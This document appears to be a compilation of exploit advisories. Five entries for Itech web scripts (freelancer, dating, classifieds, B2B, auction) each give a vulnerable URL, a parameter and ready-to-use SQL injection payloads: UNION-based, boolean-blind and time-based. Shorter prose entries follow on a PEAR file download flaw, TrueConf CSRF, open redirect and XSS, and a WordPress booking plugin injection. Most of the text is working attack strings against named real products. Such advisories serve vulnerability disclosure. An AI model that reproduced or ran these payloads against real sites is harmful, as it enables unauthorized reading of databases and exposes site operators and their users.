Itech Freelancer Script v5.13 – SQL Injection

An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read arbitrary data from the database.

URL: http://localhost/category.php?sk=4[payload]
Parameter: sk (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 52 columns
Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL

Itech Dating Script v3.26 – SQL Injection

An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read arbitrary data from the database.

URL: http://localhost/see_more_details.php?id=40[payload]
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs

Itech Classifieds Script v7.27 – SQL Injection

An SQL Injection vulnerability in Itech Classifieds Script v7.27 allows attackers to read arbitrary data from the database.

URL: http://localhost/subpage.php?scat=51[payload]
Parameter: scat (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP

Type: UNION query
Title: Generic UNION query (NULL) - 26 columns
Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES

Itech B2B Script v4.28 – SQL Injection

An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read arbitrary data from the database.

URL: catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload]
Parameter: #1* (URI)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA

Itech Auction Script v6.49 – SQL Injection

An SQL Injection vulnerability in Itech Auction Script v6.49 allows attackers to read arbitrary data from the database.

URL: http://localhost/mcategory.php?mcid=4[payload]
Parameter: mcid (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee

PEAR Arbitrary File Download

The download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.

TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities

The administration interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests (cross-site request forgery). This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed via the 'redirect_url' GET parameter is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website, e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. TrueConf also suffers from multiple stored, reflected and DOM XSS issues, where input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Online Hotel Booking System Pro v1.0 (WordPress Plugin) – SQL Injection

The vulnerability exists in the 'roomtype-details.php' script, which is part of the Online Hotel Booking System Pro v1.0 WordPress plugin. An attacker can exploit it by sending a specially crafted SQL injection payload in the 'tid' parameter of the 'roomtype-details.php' script.